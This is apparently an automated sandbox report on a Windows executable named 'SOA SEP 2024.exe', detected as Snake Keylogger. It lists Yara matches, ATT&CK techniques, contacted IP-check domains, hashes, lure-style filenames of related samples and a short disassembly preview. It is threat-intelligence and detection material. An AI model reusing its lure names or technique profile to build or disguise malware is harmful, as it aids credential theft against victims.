Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_007B8C4F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_007B923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	31 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SOA SEP 2024.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
SOA SEP 2024.exe	28%	Virustotal		Browse
SOA SEP 2024.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.75	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003294000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.75$	RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.67.152	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560694
Start date and time:	2024-11-22 07:46:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SOA SEP 2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 51 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:47:10	API Interceptor	10536255x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.67.152	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	ALI HASSO - P02515 & P02518.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Justificante de pago.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	dg_official01.exe	Get hash	malicious	GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	HSBC Advice_ACH Credit.com.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
193.122.130.0	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	132.226.8.169
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
reallyfreegeoip.org	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.66.38
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	https://365214tesauppeortbasd132.z26.web.core.windows.net/#	Get hash	malicious	TechSupportScam	Browse	104.22.44.142
	http://103.212.224.14:9998/hello	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
ORACLE-BMC-31898US	arm5.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	147.154.211.97
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=Sep	Get hash	malicious	Unknown	Browse	147.154.51.84
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152

Process:	C:\Users\user\Desktop\SOA SEP 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	222146
Entropy (8bit):	7.981355724617144
Encrypted:	false
SSDEEP:	3072:4oa8/LxK2X8f14yw+1peECs96IRSb54qES7T4YrsTTkw3LRVGRKcUVHip12HQnkF:IQK2XXRCW3Iyb4YqIRKcUVy0+7UOVj+h
MD5:	1E0046A9266966C707E7DA60DCE75D61
SHA1:	7B27D43535BE7C5D4A84C6D903BD03ECC48E6EC3
SHA-256:	BEA5536D8CB0C3F76A77186E1824EBDEC60335A88FA0E638F8F359768DF410EF
SHA-512:	2E3844CB9E00B7135CC04EAED2EBA2A60C904C18CB0327437D545818598D69AD0D0758D68562F78A99830828C16D22478664C7BBAE6384F36579391C4503FB78
Malicious:	false
Reputation:	low
Preview:	EA06......xT..:.D.R&T._>oR.M@.Je"e..L&.P.ni...N..4.K..V.....)7...._..b..W:...:..IZ.Y$.E.u:.W...../d......uX..'fOD.F.....5.M....:.q...3]t...J.tm..3?...........M$..o..=.^.&.i.L- ...M7.F.z.X.....e ..j.N.B)....0..a.O..g.:....).jp...........6.'!.J%p.8.L&.p.L.......).j}S...R...'..H.S......i..r..W....5....mSyh...}./..X.l...Y.>(.5.$.o...}...y8..).p..J.4u)3}@....U[..A-.T..L%h.h.Qh..0....'\|. ....O.....4Y(..D..4....~.P..j.N.......S..Ju"e/..&.@...u.Q .._h.o......&...e...$.N>}0.l........L...,.............?y.7.....?.:.G.I.[.[.%..H.R:....k....\|...X.....F{7..w.D...X._...M.S9...D........].}i.+..2..f...+....(...:....q.....1...3.F.ku..J.\|&>...kiS^t.......}....u.Y.V..L.' .'c..l)wj....Q(.\|x.Q....<.-..0..PMn2.j.S..]...$.Tx..w..R]5...w.A.Y9.:>...bT)S..Z....y.`QC.L.C..jG7a.._.8.FJ.....T....v..&.._?..t{....u..ry...6...T....E..+.N.J.S..Jg/.N..6..t..1.l..k~.g..[.2._.}....3P.Rk...)....!...x.}..w..[....!N....Z..#..K.e.........T..u\|.}SaN.@v.Z&.g.....'.Yn.Q..Z5..v.e!.

C:\Users\user\AppData\Local\Temp\bankrupture

Download File

Process:	C:\Users\user\Desktop\SOA SEP 2024.exe
File Type:	data
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	7.836520561819933
Encrypted:	false
SSDEEP:	6144:Q3LKimksOj8gTsl2nWsmTSbhOktNCAs0J0ZmMUFQ:8zmLHqESbh9tYP6Q
MD5:	821F850470B5EC37BE0461D86BFCE11E
SHA1:	EE9EA33CE5EF21BA2FBCDC025A0DB20C7BCF7460
SHA-256:	9EC184ECAE01EB3E76DED1EA71FF03FD0959EDC4B75FCFEC2089292A4193244E
SHA-512:	541E9C512E9B2DBC9ED347DD84452388D462A74FCF95CCB96EA9F6AC10FE0BEE7A92FF238CA9E847FD53D6DDCF4A13202552F5BB1901E71F11A2A3D06D618379
Malicious:	false
Reputation:	low
Preview:	}m.J6NDDHH2O..7R.5NDDLH2.T07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDD.H2OZ/.\J.G.e.I~.ud_;9.>6++:S"tSV<$Z:d&)h@::.^<jq..d!'Vz=:Xn5NDDLH2'D..~;.0h5.6.>.N.q5Kq5.2C...F.4.?.:.9.1f.Y,VD.:vo!L.%.I`iN0i5.6`&7X.#.KNDDLH2OT07RJ5NDD.e.)T07R.pND.ML2;.0gRJ5NDDLH.Ow1<SC5N.ELH.NT07RJ..DDLX2OT.6RJ5.DD\H2OV07WJ5NDDLH7OT07RJ5N.GLH6OT..PJ7ND.LH"OT 7RJ5^DD\H2OT07BJ5NDDLH2OT0.GH5.DDLHRMT.hSJ5NDDLH2OT07RJ5NDDLH2OT07..4NXDLH2OT07RJ5NDDLH2OT07RJ5NDD.E0O.07RJ5NDDLH2O.17.K5NDDLH2OT07RJ5NDDLH2OT07RJ.:!<8H2OL.6RJ%NDD.I2OP07RJ5NDDLH2OT0.RJU`6 -<SOT.ZRJ5.EDL&2OT.6RJ5NDDLH2OT07.J5.j -<SOT0.bJ5NdFLH$OT0=PJ5NDDLH2OT07R.5N.j>;@,T07..4ND$NH2/U07rH5NDDLH2OT07RJuND.LH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2OT07RJ5NDDLH2O

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.071268501351523
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SOA SEP 2024.exe
File size:	1'146'368 bytes
MD5:	3463c053c39de2170aa78b8aa253e999
SHA1:	e40e4169c635a3a34acb63928ad2ce89089a52fe
SHA256:	4b53b5e5756b9b3f43e32650b65590d0fe529e653a469b361df4bcf710b4e943
SHA512:	6a6a5376213f65070e5160ba34f7a7e3f44dc6c8e0e9f8205c3d5ba7dd402c0a372d42dd3a2899f7fce4eef3e5d879d64f41246d7a5139785278935e7315d82c
SSDEEP:	24576:htb20pkaCqT5TBWgNQ7aMqEpVK5aXVF6tw6A:yVg5tQ7aM+5KIW5
TLSH:	8535CF1373DE8361C3B26273BA65B701BE7B782506A1F56B2FD8093DB920162521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673FF18F [Fri Nov 22 02:50:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F1A4906A1DFh
jmp 00007F1A4905D1F4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1A4905D37Ah
cmp edi, eax
jc 00007F1A4905D6DEh
bt dword ptr [004C0158h], 01h
jnc 00007F1A4905D379h
rep movsb
jmp 00007F1A4905D68Ch
cmp ecx, 00000080h
jc 00007F1A4905D544h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1A4905D380h
bt dword ptr [004BA370h], 01h
jc 00007F1A4905D850h
bt dword ptr [004C0158h], 00000000h
jnc 00007F1A4905D51Dh
test edi, 00000003h
jne 00007F1A4905D52Eh
test esi, 00000003h
jne 00007F1A4905D50Dh
bt edi, 02h
jnc 00007F1A4905D37Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1A4905D383h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1A4905D3D5h
bt esi, 03h
jnc 00007F1A4905D428h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
